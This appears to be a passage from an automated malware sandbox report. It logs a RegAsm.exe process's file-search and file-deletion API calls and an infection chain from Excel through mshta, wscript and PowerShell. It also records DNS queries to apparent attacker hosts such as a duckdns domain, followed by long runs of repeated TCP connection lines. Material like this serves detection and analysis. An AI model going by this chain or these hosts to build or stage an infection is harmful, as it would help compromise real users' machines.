                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0040AE51 FindFirstFileW,FindNextFileW,20_2_0040AE51
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 21_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,21_2_00407EF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,22_2_00407898
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,33_2_0040928E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,33_2_0041C322
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,33_2_0040C388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,33_2_004096A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,33_2_00408847
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00407877 FindFirstFileW,FindNextFileW,33_2_00407877
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0044E8F9 FindFirstFileExA,33_2_0044E8F9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,33_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,33_2_00419B86
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,33_2_0040BD72
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,33_2_00407CD2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

                    Software Vulnerabilities

                    barindex
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
                    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Source: global trafficDNS query: name: stylite.io
                    Source: global trafficDNS query: name: stylite.io
                    Source: global trafficDNS query: name: raw.githubusercontent.com
                    Source: global trafficDNS query: name: idabo.duckdns.org
                    Source: global trafficDNS query: name: stylite.io
                    Source: global trafficDNS query: name: geoplugin.net
                    Source: global trafficDNS query: name: raw.githubusercontent.com
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49176 -> 213.183.76.22:443
                    Source: global trafficTCP traffic: 192.168.2.22:49180 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49178 -> 178.237.33.50:80
                    Source: global trafficTCP traffic: 192.168.2.22:49179 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49181 -> 192.3.220.20:80
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 213.183.76.21:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
                    Source: global trafficTCP traffic: 192.168.2.22:49170 -> 185.199.111.133:443
